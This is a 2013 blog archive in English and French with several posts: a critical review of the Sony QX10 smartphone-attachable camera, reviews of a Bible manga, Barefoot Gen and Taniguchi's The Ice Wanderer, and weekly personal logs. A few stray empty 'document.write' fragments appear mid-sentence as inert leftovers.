Sony QX10 Camera

I was looking for a new camera to replace my old Canon PowerShot S5IS. Since I got the iPhone 4S I was mostly using the smartphone to take pictures and movies because it was providing a better quality (actually, document.write(“”); same quality for the pictures [8 megapixels or 3264 x 2448] but much better for the movies: Canon shots 640 x 480 in mjpeg while the iPhone does 1920 x 1080 in H.264) and was more convenient since it’s smaller, lighter and always at hand. I was using the Canon mostly for events like film festivals where I needed to use a zoom for presentations and press conferences (the Canon has a zoom of 12x optical plus 4x digital for a total of 48x, while the iPhone 4S has only a 5x digital zoom). However, the iPhone (equipped with an Olloclip 3-in-1) also has a better macro capability.

Any recent compact point-and-shoot would have been better than the Canon, but since I am a sucker for gadgets, I was quite intrigued when Sony announced their “Smartphone Attachable Lens-Style Camera.” If it is a camera in its own right it can also be considered as a smartphone accessory, just adding to the capability of the phone while remaining compact and handy. It was quite promising. I read all the articles about the upcoming products and felt that this would be the perfect replacement for the Canon PowerShot S5IS. Maybe I was wrong?


Of the two models announced by Sony [see their respective specs as an image or online], I chose the QX10 even if the QX100 offered a better picture quality (20 megapixels instead of 18 for the QX10 and a bigger CMOS sensor [1 inch instead of 0.53 inch for the QX10]) because the QX10 offered the most zoom (10x versus 3.6x for the QX100) and a much cheaper price ($250 versus $500 for the QX100 !). And a good zoom (even if it was not as strong as the Canon) was all I needed to add to the iPhone (particularly when shooting movies). I also considered the Olloclip Telephoto, but, if it was quite cheaper ($100), it was only adding a mere 2x optical magnification so there was no comparison with the Sony QX10. Therefore I purchased it as soon as it was available (on september 25th).

The controls — Basically, the Qx10 looks like a camera lens and therefore has no viewfinder. It also has very simple controls: a power button on top [1] near the microphone [2], a tiny LCD display [3] indicating whether there’s a memory card inserted or not and the remaining battery capacity, a hook for the strap [4], a tripod socket [5], a status light [7] showing whether it’s turned on, charging or recording, the zoom lever [8], the shutter button [9], a Micro-USB plug [10] to transfer pictures and recharge the battery and a reset button [11] both hidden behind a small trap-door. The viewfinder, extra controls and settings are provided by the smartphone to which the camera is connected to (either via NFC or wi-fi direct, depending of the smartphone model–for the iPhone it’s via wi-fi since it has no Near Field Communication capability).

Battery & memory card — The bottom of the camera (opposite side to the lens) opens to reveal the Lithium Ion type N battery and a slot to insert either a microSD memory card or Memory Stick Micro media [here it’s a Nexxtech 16 Gb microSD]. Printed inside the camera’s battery cover (and on the “Quick Start Guide”) you’ll find the SSID password [here it’s blured] needed to connect with the software (you’ll need to enter it the first time only). The battery can be charged either by connecting the camera to a computer via a micro-USB to USB cable (provided), a USB AC power adapter (AC-UD10 or AC-UD11 [this one is more compact and the less expensive option at only $20, but it is currently out of stock], sold separately) or a battery charger (BC-TRX, also sold separately).

Attachment to smartphone — The camera comes with an attachment ring that fits most smartphone. It fits the iPhone without any problem even if it’s in a case. You first fix the camera to its attachment by inserting the camera into the slots, aligning the index marks on both the camera and the attachment, and then rotating the attachment until it clicks (there’s a level that you must slide to free the camera when you want to remove the smartphone attachment). You then open the attachment clamps and extend them to attach the camera to the smartphone. Just be careful not to swing the camera around too much as the smartphone might slip out of the clamps.


The software — To operate the camera with your smartphone you’ll need Sony’s software PlayMemories Mobile (available on iTunes apps store for the iPhone, iPad or iPod Touch). Once you’ve downloaded the software, connected the camera and the smartphone via wi-fi (in iPhone’s setting >> wi-fi; see picture above, on the left), you can open the app which will then connect with the camera (it takes a few seconds; see picture above, in the middle). You can now see the camera’s view, control its settings and shoots images using the touchscreen of the smartphone (see picture above, on the right).

On the top left of the apps’ screen you have the auto settings (Intelligent Auto, Superior Auto and Program Auto) and, just bellow it, the various auto settings it has selected. On the top right you have the indicator of the space left on the memory card (in number of pictures; here there’s 2450 pictures left) and the still image size (here: 4:3 18 Megapixels). Inside the picture (bottom left) you have the zoom control (Wide and Telephoto). Just bellow the picture, clicking on the arrow up or down ( sideway) removes the settings from the screen or brings them back. At the bottom left, the tools symbol opens the main settings panel for the Self-Timer (off, 2 sec, 10 sec), the Still Image Size (4:3 18M, 4:3 5M, 16:9 13M, 16:9 2M), the duration of the review image (on, off, 2 sec), the save to smartphone option (on, off), the size of the review image (original, 2M), as well as option to copy pictures from the smartphone, set the beep (on, off, shutter) and format the memory card. At the bottom center you have the shutter button and on the bottom right the mode control (photo for still images and movie). You can change the aperture and the focus by touching an area of the picture (the area of the picture that you want in-focus and best lighted).

After testing the camera in both indoor and outdoor conditions, I must admit that I am VERY disappointed by this product. It is a very cool and interesting concept: a small and compact camera that uses a smartphone for screen and storage, taking high quality pictures and movies. However, I found several serious problems:

  • The worse problem is that the PlayMemories Mobile software is constantly freezing and crashing. It seems that the latest version (3.0, dated June 26th) is not compatible with iOS 7! Without it the camera is totally useless!
  • The advantage of a smartphone camera is its portability. When you see an interesting subject, you can take your smartphone out of your pocket and QUICKLY take a picture. Unfortunately, attaching the camera to the smartphone, connecting them via wi-fi and then opening the software takes a lot of time (one or two minutes at least). By the time you’re done, your subject has moved or disappeared!
  • If you chose to save the pictures to the smartphone, it takes several seconds to do so (particularly in 18M mode), increasing considerably the time it takes to shoot a subject. It is therefore quite difficult to take quickly several pictures.
  • You can have only one wi-fi connection at a time, therefore when you are using your camera you can use only the cellular connection to upload your pictures to the cloud or share them.
  • For some reasons, even after disconnecting the camera, pictures taken with the QX10 don’t upload to iCloud. Maybe it’s because they are too big? That’s annoying because you have to plug either the camera or the smartphone to your computer to transfer them.
  • The date/time on the camera is supposed to automatically set itself to that of the smartphone to which it is connected via wi-fi. Well, it doesn’t work and the date/time started with January 1st, messing up the sorting of the pictures in iPhoto. Also quite annoying.
  • [Update: Oops! I forgot this one] It can be a little tricky to focus properly and results can be a little disappointing, particularly with the maximum zoom (10x)–which is somewhat to be expected for that type of camera.
  • The camera has no flash and the software doesn’t make use of the smartphone’s flash.
  • It saves the pictures only in jpeg (for still images) and mp4 (for movies). There’s no option to save in raw format.
  • There’s no manual controls or Aperture Priority setting (although it is available on the QX100).
  • There’s a serious lack of proper documentation. The camera comes only with a “Quick Start Guide” flyer and there’s no manual available online. Only sale sheets.

After my series of tests I almost decided to bring the camera back to the store and ask for a refund. That Bad. However, it is small and compact, and takes excellent pictures and movies. Most of the problems seems related to the fact that the PlayMemories Mobile software is poorly designed and has not been updated to work with iOS 7 (it is unbelievable that a company like Sony has failed to timely update its software considering that the iPhone market share is at its highest [even more since the release of the new models], the adoption rate of iOS7 is the fastest so far and the iPhone 4S & 5 are the most popular camera on Flickr!). Once that problem is solved it will be a pretty interesting products. So, I’ve decided to wait and see. Even if Sony doesn’t update the software soon, PinGuo has announced that the next update of its popular Camera360 software (4.7, due in October) will be compatible with the QX models. In the meantime, the QX10 is rather difficult to use and requires lots of patience.

Update (2013-10-07): Apple Insider has revealed that Sony recently promised to quickly fix their QX series’ connection problems with the iPhone. PlayMemories Mobile should be updated in “the coming weeks.” Apple Insider also says that another third-party developers, TapTapTap, is working to make its Camera+ photo apps compatible with the QX series. It should be available “shortly.”

Update (2013-10-08): Sony has updated PlayMemories Mobile very early this morning. Now the camera is more stable–it doesn’t freeze as much–the date/time problem is solved and it does upload to iCloud even in the 18M format. The focus is still tricky, but I guess it is something we could get used to. Camera+ has been updated too, but there’s still no sign of QX compatibility… Anyway, this improvement comes just in time for a few days vacation, so I will have plenty of occasions to test the updated software.

J’ai déjà introduit dans des billets précédents la collection de classiques de la littérature de East Press, Manga de Dokuha, ainsi que le second volume de cette série, La Bible (2): Le nouveau testament (oui, je sais, j’ai lu le second volume en premier mais c’est lui qui était disponible en premier). Je serai donc plutôt bref dans mon commentaire.

La Bible (vol. 1): L’Ancien Testament (??????????? / Manga de Dokuha: Ky?yaku Seisho / littéralement “Lisez en manga: L’Ancien Testament de la Bible”) est un manga seinen publié en novembre 2010 par East Press dans la collection Manga de Dokuha. Peu de détails sont connu sur le studio Variety Art Works qui a fait l’adaptation des textes et le dessin de ce manga qui se veut, comme tout les autres volumes de la collection, une sorte de condensé (style Readers’ Digest) de la Bible pour un public japonais qui n’en connait rien. Il ne s’agit pas ici de propagande religieuse mais simplement d’une introduction au texte originale (“un écrit religieux en même temps qu’un trésor d’histoires très variées qui abondent de détails et de savoirs divers” comme le précise le manga en conclusion), qui offre au lecteur un point de départ qui lui permettra ensuite, si il le désir, “d’aller jusqu’au texte d’origine.” [à droite: page 13, Dieu crée Adam et Eve]

En occident, l’histoire de l’Ancien Testament est relativement bien connue (ne serait-ce que par les nombreux films bibliques qui jouent à la télé chaque année à Pâques ou à Noël). Je me permet néanmoins un petit rappel. L’Ancien Testament est composé de nombreux livres (dont le nombre varie selon les différents canons), divisés en quatre grandes parties: le Pentateuque (Genèse, Exode, Lévitique, Nombres et Deutéronome), les livres historiques (Josué, Juges, Ruth, Samuel, Rois, Chroniques, Esdras, Néhémie, Esther, Tobie, Judith, Maccabées), Poésies et Sagesses (Job, Psaumes, Proverbes, Ecclésiaste, Cantique des Cantiques, Sagesse de Salomon, Ecclésiastique), et les prophètes (Isaïe, Jérémie, Lamentations, Baruch, Ezéchiel, Daniel, et les Douze). Ce manga s’attarde surtout sur le Pentateuque (la Genèse et l’Exode) et les livres historiques qui racontent l’histoire du peuple d’Israël depuis son entrée en Terre Promise avec Josué jusqu’à l’exil à Babylon. Le manga se divise en quinze chapitres. Il s’ouvre avec un prologue (p 5-11) qui explique brièvement ce qu’est l’Ancien Testament (un peu comme je viens de le faire), puis enchaîne avec la Génèse (p. 12-17: la création, Adam & Eve). Il poursuit avec Caïn et Abel (p. 18-25), puis l’arche de Noé (p. 26-41), la tour de Babel (p. 42-47), Abraham (p. 48-64), Sodome et Gomorrhe (p. 65-72), Isaac le sacrifié (p.73-82, où Dieu demande à Abraham de sacrifier son fils [image à droite]), Esaü et Jacob (p. 83-89), Joseph en Egypte (p. 90-113) et termine le récit du Pentateuque avec un très long chapitre sur l’Exode (p. 114-237, où Moïse libère son peuple de l’Egypte, reçoit les Dix Commandements et construit l’Arche d’Alliance). Josué (p. 238-257) lui succède et conquiert les territoires allant de Jéricho à Canaan. Puis aux temps des Juges, Gédéon (p. 258-282) poursuit la conquête de la terre promise. Un dernier gros chapitre, Le temps des Rois (p. 283-374), nous raconte brièvement l’histoire de Saul (qui défend et protège Israel), David (qui y apporte la prospérité) et Salomon (qui rend des jugement juste envers son peuple). Le tout se termine avec un prologue (p. 375-382) qui raconte en quelques pages que par la suite le royaume, affaiblit, fut divisé puis conquit par Babylone. Libéré par la conquête Perse, les israélites reprennent foi en leur Dieu qui leur envoie de nombreux prophètes et, finalement, le Messie.

Pages 194-95: Moïse sépare les eaux de la Mer Rouge pour échapper à l’armée du Pharaon

Toute cette histoire est plutôt violente et très répétitive: Dieu choisit un homme pour diriger son peuple, ce chef fait un bon travail jusqu’à ce qu’il tourne le dos à Dieu en commettant quelque péché, le chef disgracié amène la misère sur son peuple qui est conquit, puis libéré, puis le repentir amène un nouvel âge d’or. On rince et on recommence inlassablement. C’est un peu ennuyeux à lire, quoique c’est pas mauvais de se faire rappeler toute cette vieille histoire. Mais, bon, c’est pas ma période préférée. Par contre, j’ai beaucoup plus apprécié ce volume comparativement au second (le Nouveau Testament), dont j’avais trouvé le dessin plutôt moche, car justement le dessin de celui-ci est plutôt bien (bon, on s’entend, c’est tout de même pas un chef-d’oeuvre). Dans l’ensemble, c’est un manga amusant et didactique qui mérite d’être lu si vous êtes curieux ou désirez rafraîchir vos connaissances bibliques (quoique ça reste au niveau de base, la Bible 101 en quelques sortes, et en super accéléré).

The week in review (2013-09-23)

Domestic log — It was again a busy couple of weeks for me. First, document.write(“”); I had two separate sessions of union training (union rep and health & security at work). Going back to class is more tiring than working, I can tell you. I was going back home even more exhausted than usual, so I didn’t write much during that time. I wrote only one comment (which demanded lots of research, so it took me quite a while and it’s a little longer than usual [2000 words] but I am quite happy with it) about Barefoot Gen (in french). I’ll try to catch up on my writing, but unfortunately my pile of books to read keeps growing faster than I can write about them!

We’re definitely having an early autumn this year. Already by mid-september the temperature had drop to 10~12?C and leaves had started falling from the trees! And I could see (or hear) flights of geese going south. It definitely bodes ill for the season… Now autumn is here and it shows (although the temperature has warmed up a little). It is sunny today, but days tend to be rather dull and cloudy lately. To add to the gloomy atmosphere, two friends of my father died in the last week.

“Oh my God! It’s full of kittens!” An alternate version of 2001 Space Odyssey? No: my backyard in the last couple of weeks! Two separate litters of kittens roam in the backyard. I had a scare when, one day, they all disappeared (I was dismayed: who had stolen my kittens?! It was a hard blow to take after the unexpected departure of my beloved Spotty) but they were all back the next day. I don’t know what happened but I was glad to see them back (actually it was to be expected because mothers tend to move their kittens after a while for security reasons, so it could happen again; although the shed is providing them shelter and there’s always food). If they are still around next month I am planning to adopt one of them, whose shown us great interest and affection…

Besides all that, we keep watching British period drama on TV (finishing Copper and Foyle’s War, only one episode left to the first season of The Bletchley Circle, but season four of Downton Abbey is just starting) and enjoying the beautiful crops of our garden!

Press review — Lately the news have been dominated by two stories: Apple releasing new products (iPhones 5s and 5c, iOS 7) and lots of discussions on the charter of Quebec values. I could say a lot on this subject, but I’ll try to be brief.


I totally agree on the principle that Quebec society (and particularly its government) should be totally secular. I’ve always said that religion should take place only in your head [not on your head!], your home and your temple. No need to broadcast your beliefs with ostentatious signs (and certainly not blocking the metro entrance or wake me up in the morning to distribute leaflets of religious propaganda!). Unfortunately, the government (PQ) has handled the whole situation quite badly, which has been blown out of proportion by its opponents and gave it the bitter taste of xenophobia (some conspiracy theorists say it was done on purpose: either to distract from their poor economical performance or, even crazier, to drive immigrants out of the province to increase their chance in a future sovereignty referendum). However, it should be done fair and square, equally and evenly. Catholic signs of faith should receive the same treatment. That also means no crucifix in classes or in the parliament, no prayers before council meetings.

Personally, I don’t see the problem. I don’t wear any signs of my belief, so why should other people do? Religion is a private matter. That’s the way it should be done here, so why not adapt to this? It is a question of equality. People want to be treated equally? Then it works both ways. And, in this case, the charter is not attacking their liberty of whatever at all: it only asks people not to wear any religious signs if they work for the government, and only during the working hours! Outside of that they can do whatever they want! Someone on the internet compared this with wearing a uniform at work. Is that too much to ask? Of course, it is a delicate and complex subject. The veil that some muslim women wear: is it a religious or cultural expression (after all the Koran only asks women to be “modest”)? Same situation for the turban wore by the Sikhs: in itself it is not an ostentatious sign as it is only used to contains the long hair that their religion requires them not to cut, ever. We should think carefully about all this. Maybe some exceptions, some compromises, are necessary. Unfortunately, many are using this to further their own agenda. If the debate gets ugly, we should try to put ourselves in the others’ place. The fact that we are debating the subject is quite healthy in itself. I am sure we can find a solution that will be acceptable for all and thus preserve the beautiful cultural diversity of our society.

Au début d’août, au moment de l’anniversaire du bombardement d’Hiroshima, NHK World a présenté un reportage (dans le cadre de l’émission “Today’s Close-up”) sur Gen d’Hiroshima et son créateur, Keiji Nakazawa (le reportage est disponible dans son intégralité sur Youtube). Cela m’a incité à en lire tout au moins le premier tome (ce que je me promettais depuis longtemps). Il est étrange que ce titre, pourtant considéré comme un classique, n’ait jamais été publié par les grands éditeurs de manga mais par de petits éditeurs ou des éditeurs mainstream qui n’ont pas su en faire la mise en marché proprement — et ce tant en français qu’en anglais. Je possède l’une des premières éditions anglaise du premier tome (New Society Publishing, 1987), mais j’ai préféré en emprunter la version française à la bibliothèque afin de la commenter car je la considère plus intéressante et plus respectueuse de l’original.

Gen d’Hiroshima (?????? / Hadashi no Gen / lit. “Gen aux pieds nus”) voit le jour au Japon lorsque Keiji Nakazawa (qui est déjà un mangaka professionnel depuis 1963) publie Ore wa mita [“Je l’ai vu”, qui sera publiée en anglais par EduComics en janvier 1982], un court récit autobiographique d’une cinquantaine de pages, dans le numéro d’octobre du magazine Monthly Sh?nen Jump. L’histoire est si bien reçu que l’éditeur lui propose d’en faire une série qui sera prépublié en feuilletons dans Weekly Sh?nen Jump (1973-74). Cependant, après avoir été abandonné par Shueisha, son éditeur, c’est Chuokoron-Shinsha qui le publiera en volumes (tank?bon) en 1975 et la prépublication en feuilletons se poursuivra dans divers petits magazines intellos (1975-85, Shimin [Citoyen], Bunka Hy?ron [Critique Culturelle] et Ky?iku Hy?ron [Critique d’Éducation]).

Gen d’Hiroshima a d’abord été traduit en anglais par Project Gen, un groupe d’étudiants pacifistes de Tokyo formé en 1976 (Yukio Aki, Alan Gleason [fondateur du groupe qui fera plus tard, entre autre, des traductions pour Dark Horse, tel que Oh My Goddess!], Ann Gleason, Yuko Kitaura, Katsuhiko Mochizuki, Hiroyo Mori, Masahiro Oshima, Noriko Oshima, Leonard Rifas [fondateur du petit éditeur EduComics], Frederik L. Schodt [auteur d’ouvrages sur les manga et sur Osamu Tezuka, traducteur des romans de Gundam, entre autres], Akiko Sugiura, Toshihide Suzuki). Il est publié pour la première fois en anglais par EduComics (et c’est d’ailleurs le premier manga a avoir été traduit dans une langue européenne [Schodt, Manga! Manga!, p. 238]) mais seulement deux fascicules en format “comics” paraitront (1980-81). Cette publication connait un succès critique fracassant mais cela fut loin d’être une réussite commerciale. EduComics eut un peu plus de succès avec la publication de I Saw It (1982), en y ajoutant de la couleur et des ombrages pour y donner une apparence plus familière au public américain, mais toute la controverse autour du sujet a presque détruit le petit éditeur [Schodt, Dreamland Japan, p. 309]. La publication fut reprise plus tard (1987-88) par New Society Publishing, cette fois en format livre (graphic novel), mais s’arrêta après seulement quatre volumes [Adams, p. 94]. Penguin en publia aussi quelques volumes. L’édition actuelle par Last Gasp (2003-10), qui y ajouta une introduction par Art Spiegelman, est finalement complète (dix volumes, quoique le premier est pour l’instant épuisé).

Pour ce qui est de l’édition française, Gen d’Hiroshima fut d’abord publié par Les Humanoïdes Associés en 1983 (mais seulement un volume de deux-cent pages). Ce fut d’ailleurs le premier manga publié en France. Albin Michel fit également une tentative (un volume titré Mourir pour le Japon) en 1990. C’est finalement Vertige Graphic qui publiera la série au complet (2003-11), à la fois en grand format (17 x 24 cm) et en format poche. Certains tomes de la version poche sont manquants mais on me dit qu’ils seront réimprimés en 2014. Je ne peux malheureusement pas vous donner de lien direct vers le catalogue de Vertige Graphic car leur site est en construction et, pour l’instant, seulement une vingtaine de titres y apparaissent (il en manque encore une bonne centaine, dont Gen d’Hiroshima) mais le site devrait être à jour vers la fin octobre.

Inspiré par Shin Takarajima de Tezuka, Keiji Nakazawa commence à dessiner dès le milieu des années cinquante, vers l’âge de quinze ans. Il déménage à Tokyo en 1961 pour devenir mangaka et se trouve un travail d’assistant. Il publie sa première histoire, Spark 1, dans Sh?nen Gah? en 1963. Il publiera dans d’autres magazines mais sans beaucoup de succès. Ce n’est qu’en 1966, à la mort de sa mère, qu’il revient à Hiroshima et découvre sa vocation. Il est choqué tant par le fait que le US Atomic Bomb Casualty Committee avait réquisitionné le corps de sa mère pour en faire l’autopsie afin d’étudier les effets des radiations [Adams, p. 92], que par la constatation qu’après la crémation il ne restait plus que des cendres de ses os (un effet du césium qui affaiblit la structure osseuse). “Je me sentais comme si ma mère me disait de transmettre au monde entier la vérité sur la bombe” [Gravett, p. 57]. Il confronta donc ses souvenirs et utilisa son travail de mangaka pour décrire l’indicible horreur d’Hiroshima et de ses conséquences.

Nakazawa commence donc à produire des histoires anti-guerres. Il en publiera huit, dont Kuroi ame ni utarete (Sous la pluie noire, 1968), Aru hi totsuzen (Soudain un jour, 80 pages, 1970) et Ore wa mita (Je l’ai vu, 46 pages, 1972). Avec cette dernière, il en vient à un point tournant où, après avoir raconté des histoires de survivants (appelés hibakusha), il nous offre son propre témoignage et décrit comment, à l’âge de six ans, il a survécu au bombardement d’Hiroshima, la perte son père, son frère cadet et de sa soeur dans l’incendie qui suivi, et comment tout cela l’amena à devenir un mangaka anti-guerre [Schodt Manga! Manga! p. 155]. Après avoir écrit des histoires de plus en plus longues, Nakazawa s’attaque maintenant à une série. Avec Hadashi no Gen (1973-85) il reprend sa propre histoire mais en se concentrant seulement sur son enfance. Il modifie le récit, l’étend considérablement (totalisant près de deux mille pages!) et change les noms [Adams p. 90]. Keiji devient alors Gen, qui signifit “racine”. Nakazawa espère ainsi que son récit fera germer chez ses lecteurs une compréhension de la guerre et de ses atrocités, les inspirant à travailler pour la paix. Le manga engendrera également trois long-métrages, un film d’animation et même un opéra.


L’histoire du premier volume de Gen d’Hiroshima est entièrement consacrée à décrire les conditions de vie quotidienne de la population japonaise durant les dernier moments de la guerre: le rationnement et la pénurie de nourriture, la pauvreté et la misère, les entrainements quotidiens (et futile) avec des lances de bambou, la constante propagande et répression militaire, la cruauté des entrainements militaires, le mépris pour la vie des jeunes soldats et l’entêtement dans une guerre sans espoir [Schodt Manga! Manga! p. 75; Thompson p. 21]. La souffrance de la famille de Gen est d’autant plus grande que le père est un artiste ouvertement pacifiste qui s’insurge contre le privilège des riches, l’injustice faite aux coréens et critique le militarisme excessif, ce qui, en temps de guerre, équivaut à la trahison. Ils seront donc ostracisés et persécutés tant par leur voisins que par la police [Schodt Manga! Manga! p. 238]. Je ne doute pas de la véracité de ces dures conditions car ma femme m’a raconté que la famille de son père (heureusement trop jeune pour être conscrit) devait cultiver du riz pour les soldats mais ne pouvait en manger car la population n’avait droit qu’aux patates!

Les volumes subséquents traitent surtout de la souffrance des hibakusha. Les “chanceux” qui ont survécu à l’explosion et aux radiations doivent maintenant faire face à la famine, au désordre social (incluant la monté du crime organisé et les marchés noirs qui en découlent), à l’indifférence de l’occupant américain et, surtout, à la discrimination que leur condition de “contaminés” leur fera subir pour le reste de leur existence [Schodt Manga! Manga! p. 238]. Par la suite, dans l’espoir sans doute d’accroitre la popularité de son oeuvre, Nakazawa consacre un peu plus de temps aux gamineries espiègles des jeunes survivants désoeuvrés. Malgré cela, la représentation réaliste et parfois trop “graphique” de la dureté des conditions des survivants et des effets de la bombe [Schodt Manga! Manga! p. 238], de même que la critique qu’il fait tant du militarisme japonais que des comportements de l’occupant lui vaudront des objections sérieuses venant des deux côtés du Pacifique [Adams p. 92], ce qui nuira beaucoup à la diffusion de son oeuvre. La controverse se poursuit même de nos jours, alors qu’une commission scolaire du sud-ouest du Japon a décidé de retirer le manga des bibliothèques de ses écoles primaires et secondaires à cause de la représentation de la brutalité commise par les troupes japonaises (certains d’ailleurs nient que ces atrocités aient même eu lieu) [ANN, The Asahi Shimbun].


Gen d’Hiroshima est un drame historique, un manga documentaire, qui nous offre une histoire extrêmement émouvante ainsi qu’un message pacifiste puissant et universel [Schodt Manga! Manga! p. 238; Thompson p. 21]. On y retrouve le même style caricatural que chez les autres mangaka de sa génération (Ishinomori, Mizuki, Tatsumi, Tezuka), simple mais très expressif, “stylisant les émotions les plus dramatiques” [Manga Dico p. 372], mais qui n’est pas apprécié de tous puisque certains qualifient son dessin de “médiocre et empesé” [Groensteen p. 112]. Son style narratif est assez fluide. Malgré le sujet, il ne cherche pas a impressionner mais présente simplement les faits, variant les éléments de l’histoire pour conserver l’attention du lecteur. Il évite la dramatisation outrancière en contre-balancant d’une bonne dose d’humour, certaines scènes de bagarres approchant même le burlesque, et sait faire preuve de techniques narratives plus complexes (comme lorsqu’il marque le temps en représentant régulièrement le soleil–symbole impérial japonais–qui emplit la case).

L’édition anglaise de Last Gasp offre une excellente traduction, une bonne qualité d’impression et de papier mais malheureusement les planches ont été inversées afin de présenter l’histoire dans le sens de lecture occidental (de gauche à droite). Pour cette raison, je préfère l’édition française en format de poche de Vertige Graphic, qui nous présente le manga dans sa forme originale. La traduction, par Koshi Miyoshi et Vincent Zouzoulkovsky, est toute aussi bonne (quoique la qualité du papier et de l’impression laisse un peu à désirer). Un seul bémol cependant: pour une raison étrange l’édition française comporte douze pages de moins en fin de volume (j’espère qu’elles se retrouvent au début du volume suivant!).

Nakazawa a conçu Gen d’Hiroshima comme un manga pour enfant (sh?nen), mais la complexité, le sérieux et la dureté du sujet font qu’il est souvent considéré en occident comme un manga seinen, voir un gekiga. Quoiqu’il en soit c’est une lecture incontournable tant par son importance dans l’histoire du manga, que par la valeur didactique de son message pacifiste. Donc, à lire absolument.

The work of Jir? Taniguchi has been repeatedly recommended to me and I must admit that I was bewitched from my first reading. Its superb, precise and poignant style as well as his concise and clever narrative–which always move forward at a very slow and almost contemplative pace–make him a must-artist and the most zen of all mangaka I know! And it is precisely his detailed craftsmanship and profound stories that closely resembles European comics (of which he acknowledges the influence) and that’s probably why he is much more popular in Europe that America.

The Ice Wanderer [????? / T?do no Tabibito / lit. “the tundra’s traveler”], first published in 2004, is no exception and is a superb example of Taniguchi’s talent. It is a collection of six short stories. The overall general theme of this collection is very Japanese and a very dear subject to the author: the respect and communion with nature. This is particularly evident in the last story, “Return to the Sea”. A man is studying whales in Alaska. Following an accident, the whale known as Old Dick saves his life. In fall, after the start of the great seasonal whales migration, Old Dick stayed behind and, like told in Inuit folklore, returned to his origin in the deep sea abyss. The man follow the whale to witness this “death rite” and almost dies himself. This story was first published in Japan in Big Comic Spirits (March 28th, 1994).

As for the first three stories, they deal more with the confrontation against wilderness and the fight for survival. In “The Ice Wanderer”, two men, who are lost in the Klondike region (Yukon) in 1897, owe their survival only to the providential appearance of an old hunter, who tells them a strange legend (first published in Big Comic Original Extra Edition, on July 2nd, 2003). In “White Wilderness”, two explorers travelling in the Yukon river basin (Alaska) to bury one of their companions, are struggling to survive as they are surrounded by wolves (this is a retelling of the first part of Jack London’s White Fang; first published in Big Comic Original Extra Edition, on December 28th, 2003). In “Our Mountains”, at the beginning of the Showa period (in the 20s) in the Senhoku district (Akita prefecture), a man goes on the trail of the bear that killed his son (first published in Big Comic Special Extra Edition, on December 1st, 2002).

The two remaining stories of the collection are distinguishing themselves by focusing more on another theme very dear to the author: they are touching stories telling every day’s life with a kind of urban nostalgia which sometimes feels autobiographical. In “Kaiyose-Jima” (“The island where the wind brings the seashells“, first published in Big Comic Original Extra Edition, on July 1st, 2004) we already find a more human environment. Following his parents’ divorce and his mother’s illness, the young Takashi spends the summer with his uncle in a small fishing village. With Yae-chan, an orphan taken in by his uncle and who taught him to swim, he gradually forgets the grief caused by his mother’s absence. One day, as they were gathering seashells together, a storm pushed their boat out to sea and they have to spend a terrible night on a small island.

In “Sh?kar?” (first published in Big Comic, January 10th, 1998), the story takes place in a more urban environment. Set in the 45th year of the Showa period (1970), it tells of a young mangaka who is influenced by the atmosphere of his new apartment, located in a former brothel. I do not think these two stories break completely with the theme of nature, because here Taniguchi seems to tell us that we can always communicate with our environment, whether it’s natural or urban.

All in all, although this collection of short stories is a bit uneven, it is nevertheless a very good reading. It is worth noting that the work done by Fanfare (for the editing, translation and notes) and Ponent Mon (for the publishing) is excellent. I particularly appreciate that they respected the original format (reading from right to left) and did not flip the art (which unfortunately seems to happen often in North American editions). This is a high quality book (fine printing, good paper and binding) that everyone should read, as it is perfect to get acquainted with the work of Taniguchi.

The week in review (2013-09-09)

On the home front, there’s nothing really new. The Montreal World Film Festival has ended and I saw the last of the Japanese movies (I’ve seen them all save for the shorts). All in all it was a satisfactory experience. Now I have to write about those movies (and maybe do an overview of the festival). Although, the next couple of weeks, I’ll be busy getting some union training. And right now (while writing this and doing the laundry) I am waiting for a plumber to come repair a leaky hot-water tap in the bathtub (I couldn’t get a firm appointment, so he *might* come before the end of the day).

In the press realm, there an awful lot of technological news lately probably due to
Apple imminent new products announcement. Sony also announced a very interesting ‘Lens-Style’ set of digital cameras working as smartphone accessories. And Miyazaki announced (again) his retirement. You can check this week’s scrap-linking right after the jump:

Haikasoru is Viz Media‘s imprint dedicated to bringing Japanese science fiction to the english-speaking world. They publish japanese literary works–whether they are award-winners, document.write(“”); classics, or new work by the hottest young writers–“featuring the action of anime and the thoughtfulness of the best speculative fiction” (from space opera to dark fantasy to hard science). I was recently reminded of the existence of this collection because one of its titles, The Future Is Japanese, is featuring a short story that just won the 2013 Hugo Award for Best Short Story at LoneStarCon 3, in San Antonio, Texas. The short story is “Mono no Aware” by Chinese-American science fiction writer Ken Liu. It “tells the tale of the last Japanese survivor aboard an American space habitat after an asteroid has destroyed the Earth. This is the second story for which Ken Liu has won a Hugo Award”.

The Future Is Japanese, “edited by Nick Mamatas and Masumi Washington, is an anthology collecting science fiction from, and about, Japan, by some of the world’s best genre writers” (Pat Cadigan, Toh EnJoe, Project Itoh, Hideyuki Kikuchi, Ken Liu, David Moles, Issui Ogawa, Felicity Savage, Ekaterina Sedia, Bruce Sterling, Rachel Swirsky, TOBI Hirotaka, Catherynne M. Taniguchi in english

It is clear by now that Jiro Tanigichi is one of my favourite mangaka. Most of his work has been published in french by various publishers (mostly Casterman and Kana), document.write(“”); but there’s still only a few titles available in english and all (mostly) from the same publisher: Fanfare/Ponent Mon.

In fact, Fanfare/Ponent Mon is not really one publisher but two small publishers, from United Kingdom and Spain, working together “to bring quality storytelling in the comic medium”. So small that Fanfare is actually a one-person company, where Stephen Robson is owner, publisher, and editor (see his interview on Manga Worth Reading)! According to their website, they focused at the beginning mostly “on the French and Japanese alternative scene through Frédéric Boilet´s “Nouvelle Manga” movement” but are now widening their interest, although always selecting and publishing the best original works they can find.

It is certainly true for their selection of Taniguchi’s titles:

So far, I’ve talked and commented mostly on the french edition of Taniguchi’s manga, but I also want to comment on the english books and I will–as soon as I get my hands on more of them (I have already a few of them but I’d like to have more than one volume of a series in order to have a better idea of the story before commenting on it).

